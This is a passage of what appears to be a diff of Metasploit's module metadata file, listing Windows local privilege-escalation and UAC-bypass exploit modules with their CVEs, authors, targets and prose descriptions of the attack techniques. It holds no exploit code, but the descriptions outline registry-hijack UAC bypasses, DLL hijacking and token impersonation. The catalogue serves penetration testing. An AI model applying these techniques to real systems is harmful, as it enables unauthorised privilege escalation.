- "BID-12742" - ], - "platform": "Windows", - "arch": "", - "rport": 5093, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6", - "SentinelLM 7.2.0.0 Windows 2000 English", - "SentinelLM 7.2.0.0 Windows 2000 German", - "SentinelLM 7.2.0.0 Windows XP English SP0/SP1", - "SentinelLM 7.2.0.0 Windows 2003 English SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/license/sentinel_lm7_udp.rb", - "is_install_path": true, - "ref_name": "windows/license/sentinel_lm7_udp", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/local/adobe_sandbox_adobecollabsync": { - "name": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", - "fullname": "exploit/windows/local/adobe_sandbox_adobecollabsync", - "aliases": [], - "rank": 500, - "disclosure_date": "2013-05-14", - "type": "exploit", - "author": [ - "Felipe Andres Manzano", - "juan vazquez " - ], - "description": "This module exploits a vulnerability on Adobe Reader X Sandbox. The\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\n process to write register values which can be used to trigger a buffer overflow on\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.", - "references": [ - "CVE-2013-2730", - "OSVDB-93355", - "URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader X 10.1.4 / Windows 7 SP1" - ], - "mod_time": "2022-12-04 17:41:24 +0000", - "path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb", - "is_install_path": true, - "ref_name": "windows/local/adobe_sandbox_adobecollabsync", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/agnitum_outpost_acs": { - "name": "Agnitum Outpost Internet Security Local Privilege Escalation", - "fullname": "exploit/windows/local/agnitum_outpost_acs", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-08-02", - "type": "exploit", - "author": [ - "Ahmad Moghimi", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load\n arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).", - "references": [ - "OSVDB-96208", - "EDB-27282" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Agnitum Outpost Internet Security 8.1" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb", - "is_install_path": true, - "ref_name": "windows/local/agnitum_outpost_acs", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/alpc_taskscheduler": { - "name": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation", - "fullname": "exploit/windows/local/alpc_taskscheduler", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-08-27", - "type": "exploit", - "author": [ - "SandboxEscaper", - "bwatters-r7", - "asoto-r7", - "Jacob Robles" - ], - "description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.", - "references": [ - "CVE-2018-8440", - "URL-https://github.com/SandboxEscaper/randomrepo/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/alpc_taskscheduler.rb", - "is_install_path": true, - "ref_name": "windows/local/alpc_taskscheduler", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "os-resource-loss" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/always_install_elevated": { - "name": "Windows AlwaysInstallElevated MSI", - "fullname": "exploit/windows/local/always_install_elevated", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-03-18", - "type": "exploit", - "author": [ - "Ben Campbell ", - "Parvez Anwar" - ], - "description": "This module checks the AlwaysInstallElevated registry keys which dictates if\n .MSI files should be installed with elevated privileges (NT AUTHORITY\\SYSTEM).\n The generated .MSI file has an embedded executable which is extracted and run\n by the installer. After execution the .MSI file intentionally fails installation\n (by calling some invalid VBS) to prevent it being registered on the system.\n By running this with the /quiet argument the error will not be seen by the user.", - "references": [ - "URL-http://www.greyhathacker.net/?p=185", - "URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx", - "URL-http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/always_install_elevated.rb", - "is_install_path": true, - "ref_name": "windows/local/always_install_elevated", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/anyconnect_lpe": { - "name": "Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)", - "fullname": "exploit/windows/local/anyconnect_lpe", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-08-05", - "type": "exploit", - "author": [ - "Yorick Koster", - "Antoine Goichot (ATGO)", - "Christophe De La Fuente" - ], - "description": "The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.8.02042 is vulnerable to path traversal and allows local attackers\n to create/overwrite files in arbitrary locations with system level privileges.\n\n The installer component of Cisco AnyConnect Secure Mobility Client for Windows\n prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers\n to execute code on the affected machine with with system level privileges.\n\n Both attacks consist in sending a specially crafted IPC request to the TCP\n port 62522 on the loopback device, which is exposed by the Cisco AnyConnect\n Secure Mobility Agent service. This service will then launch the vulnerable\n installer component (`vpndownloader`), which copies itself to an arbitrary\n location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being\n executed with system privileges. Since `vpndownloader` is also vulnerable to DLL\n hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same\n location `vpndownloader` will be copied to get code execution with system\n privileges.\n\n The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect\n Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10\n version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been\n successfully tested against Cisco AnyConnect Secure Mobility Client versions\n 4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version\n 1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).", - "references": [ - "URL-https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj", - "CVE-2020-3153", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW", - "CVE-2020-3433" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86/x64 with x86 payload" - ], - "mod_time": "2023-01-28 09:08:51 +0000", - "path": "/modules/exploits/windows/local/anyconnect_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/anyconnect_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/applocker_bypass": { - "name": "AppLocker Execution Prevention Bypass", - "fullname": "exploit/windows/local/applocker_bypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-08-03", - "type": "exploit", - "author": [ - "Casey Smith", - "OJ Reeves" - ], - "description": "This module will generate a .NET service executable on the target and utilize\n InstallUtil to run the payload bypassing the AppLocker protection.\n\n Currently only the InstallUtil method is provided, but future methods can be\n added easily.", - "references": [ - "URL-https://gist.github.com/subTee/fac6af078937dda81e57" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/local/applocker_bypass.rb", - "is_install_path": true, - "ref_name": "windows/local/applocker_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/appxsvc_hard_link_privesc": { - "name": "AppXSvc Hard Link Privilege Escalation", - "fullname": "exploit/windows/local/appxsvc_hard_link_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-04-09", - "type": "exploit", - "author": [ - "Nabeel Ahmed", - "James Forshaw", - "Shelby Pace" - ], - "description": "There exists a privilege escalation vulnerability for\n Windows 10 builds prior to build 17763. Due to the AppXSvc's\n improper handling of hard links, a user can gain full\n privileges over a SYSTEM-owned file. The user can then utilize\n the new file to execute code as SYSTEM.\n\n This module employs a technique using the Diagnostics Hub Standard\n Collector Service (DiagHub) which was discovered by James Forshaw to\n load and execute a DLL as SYSTEM.", - "references": [ - "CVE-2019-0841", - "URL-https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/", - "URL-https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html", - "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", - "URL-https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/appxsvc_hard_link_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ask": { - "name": "Windows Escalate UAC Execute RunAs", - "fullname": "exploit/windows/local/ask", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-01-03", - "type": "exploit", - "author": [ - "mubix ", - "b00stfr3ak" - ], - "description": "This module will attempt to elevate execution level using\n the ShellExecute undocumented RunAs flag to bypass low\n UAC settings.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/ask.rb", - "is_install_path": true, - "ref_name": "windows/local/ask", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bits_ntlm_token_impersonation": { - "name": "SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.", - "fullname": "exploit/windows/local/bits_ntlm_token_impersonation", - "aliases": [], - "rank": 500, - "disclosure_date": "2019-12-06", - "type": "exploit", - "author": [ - "Cassandre", - "Andrea Pierini (decoder)", - "Antonio Cocomazzi (splinter_code)", - "Roberto (0xea31)" - ], - "description": "This module exploit BITS behavior which tries to connect to the\n local Windows Remote Management server (WinRM) every times it\n starts. The module launches a fake WinRM server which listen on\n port 5985 and triggers BITS. When BITS starts, it tries to\n authenticate to the Rogue WinRM server, which allows to steal a\n SYSTEM token. This token is then used to launch a new process\n as SYSTEM user. In the case of this exploit, notepad.exe is launched\n as SYSTEM. Then, it write shellcode in its previous memory space\n and trigger its execution. As this exploit uses reflective dll\n injection, it does not write any file on the disk. See\n /documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md\n for complementary words of information.\n\n Vulnerable operating systems are Windows 10 and Windows servers where WinRM is not running.\n Lab experiments has shown that Windows 7 does not exhibit the vulnerable behavior.\n\n WARNING:\n\n - As this exploit runs a service on the target (Fake WinRM on port\n 5985), a firewall popup may appear on target screen. Thus, this exploit\n may not be completely silent.\n\n - This exploit has been successfully tested on :\n Windows 10 (10.0 Build 19041) 32 bits\n Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits\n\n - This exploit failed because of no BITS authentication attempt on:\n Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits\n\n - Windows servers are not vulnerable because a genuine WinRM\n service is already running, except if the user has disabled it\n (Or if this exploit succeed to terminate it).\n\n - SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are\n required.\n\n - BITS must not be running.\n\n - This exploit automatically perform above quoted checks.\n run \"check\" command to run checklist.", - "references": [ - "URL-https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/", - "URL-https://github.com/antonioCoco/RogueWinRM" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb", - "is_install_path": true, - "ref_name": "windows/local/bits_ntlm_token_impersonation", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bthpan": { - "name": "MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", - "fullname": "exploit/windows/local/bthpan", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-07-18", - "type": "exploit", - "author": [ - "Matt Bergin ", - "Jay Smith " - ], - "description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\n into an arbitrary location. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.", - "references": [ - "MSB-MS14-062", - "CVE-2014-4971", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt", - "OSVDB-109387" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bthpan.rb", - "is_install_path": true, - "ref_name": "windows/local/bthpan", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac": { - "name": "Windows Escalate UAC Protection Bypass", - "fullname": "exploit/windows/local/bypassuac", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-12-31", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "mitnick", - "mubix " - ], - "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off.", - "references": [ - "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_comhijack": { - "name": "Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)", - "fullname": "exploit/windows/local/bypassuac_comhijack", - "aliases": [], - "rank": 600, - "disclosure_date": "1900-01-01", - "type": "exploit", - "author": [ - "Matt Nelson", - "b33f", - "OJ Reeves" - ], - "description": "This module will bypass Windows UAC by creating COM handler registry entries in the\n HKCU hive. When certain high integrity processes are loaded, these registry entries\n are referenced resulting in the process loading user-controlled DLLs. These DLLs\n contain the payloads that result in elevated sessions. Registry key modifications\n are cleaned up after payload invocation.\n\n This module requires the architecture of the payload to match the OS, but the\n current low-privilege Meterpreter session architecture can be different. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.\n\n This module invokes the target binary via cmd.exe on the target. Therefore if\n cmd.exe access is restricted, this module will not run correctly.", - "references": [ - "URL-https://wikileaks.org/ciav7p1/cms/page_13763373.html", - "URL-https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2024-09-04 23:49:33 +0000", - "path": "/modules/exploits/windows/local/bypassuac_comhijack.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_comhijack", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_dotnet_profiler": { - "name": "Windows Escalate UAC Protection Bypass (Via dot net profiler)", - "fullname": "exploit/windows/local/bypassuac_dotnet_profiler", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-03-17", - "type": "exploit", - "author": [ - "Casey Smith", - "\"Stefan Kanthak\" ", - "bwatters-r7" - ], - "description": "Microsoft Windows allows for the automatic loading of a profiling COM object during\n the launch of a CLR process based on certain environment variables ostensibly to\n monitor execution. In this case, we abuse the profiler by pointing to a payload DLL\n that will be launched as the profiling thread. This thread will run at the permission\n level of the calling process, so an auto-elevating process will launch the DLL with\n elevated permissions. In this case, we use gpedit.msc as the auto-elevated CLR\n process, but others would work, too.", - "references": [ - "URL-https://seclists.org/fulldisclosure/2017/Jul/11", - "URL-https://offsec.provadys.com/UAC-bypass-dotnet.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-07-21 15:34:49 +0000", - "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_dotnet_profiler", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_eventvwr": { - "name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)", - "fullname": "exploit/windows/local/bypassuac_eventvwr", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-08-15", - "type": "exploit", - "author": [ - "Matt Nelson", - "Matt Graeber", - "OJ Reeves" - ], - "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows Event Viewer is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", - "references": [ - "URL-https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_eventvwr.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_eventvwr", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_fodhelper": { - "name": "Windows UAC Protection Bypass (Via FodHelper Registry Key)", - "fullname": "exploit/windows/local/bypassuac_fodhelper", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-12", - "type": "exploit", - "author": [ - "winscriptingblog", - "amaloteaux " - ], - "description": "This module will bypass Windows 10 UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", - "references": [ - "URL-https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "URL-https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1", - "URL-https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2025-04-23 17:49:11 +0000", - "path": "/modules/exploits/windows/local/bypassuac_fodhelper.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_fodhelper", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/bypassuac_injection": { - "name": "Windows Escalate UAC Protection Bypass (In Memory Injection)", - "fullname": "exploit/windows/local/bypassuac_injection", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-12-31", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "mitnick", - "mubix ", - "Ben Campbell ", - "Lesage", - "OJ Reeves" - ], - "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.", - "references": [ - "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/", - "URL-http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_injection.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_injection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_injection_winsxs": { - "name": "Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS", - "fullname": "exploit/windows/local/bypassuac_injection_winsxs", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-04-06", - "type": "exploit", - "author": [ - "Ernesto Fernandez \"L3cr0f\" " - ], - "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off by abusing the way \"WinSxS\" works in Windows\n systems. This module uses the Reflective DLL Injection technique to drop\n only the DLL payload binary instead of three seperate binaries in the\n standard technique. However, it requires the correct architecture to be\n selected, (use x64 for SYSWOW64 systems also).", - "references": [ - "URL-https://github.com/L3cr0f/DccwBypassUAC" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_injection_winsxs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_sdclt": { - "name": "Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)", - "fullname": "exploit/windows/local/bypassuac_sdclt", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-03-17", - "type": "exploit", - "author": [ - "enigma0x3", - "bwatters-r7" - ], - "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n Window backup and restore is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.", - "references": [ - "URL-https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", - "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1", - "URL-https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_sdclt", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_silentcleanup": { - "name": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)", - "fullname": "exploit/windows/local/bypassuac_silentcleanup", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-02-24", - "type": "exploit", - "author": [ - "tyranid", - "enigma0x3", - "nyshone69", - "lokiuox", - "Carter Brainerd (cbrnrd)" - ], - "description": "There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges.\n When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,\n %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.", - "references": [ - "URL-https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html", - "URL-https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/", - "URL-https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", - "URL-https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/bypassuac_silentcleanup.rb", - "is_install_path": true, - "ref_name": "windows/local/bypassuac_silentcleanup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/bypassuac_sluihijack": { - "name": "Windows UAC Protection Bypass (Via Slui File Handler Hijack)", - "fullname": "exploit/windows/local/bypassuac_sluihijack", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-01-15", - "type": "exploit", - "author": [ - "bytecode-77", - "gushmazuko" - ], - "description": "This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under\n the Current User hive, and inserting a custom command that will get invoked when any binary\n (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable\n to file handler hijacking. When we run slui.exe with changed Registry key\n (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin\n instead of slui.exe.\n\n The module modifies the registry in order for this exploit to work. The modification is\n reverted once the exploitation attempt has finished.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting the\n payload in a different process.", - "references": [ - "URL-https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation", - "URL-https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 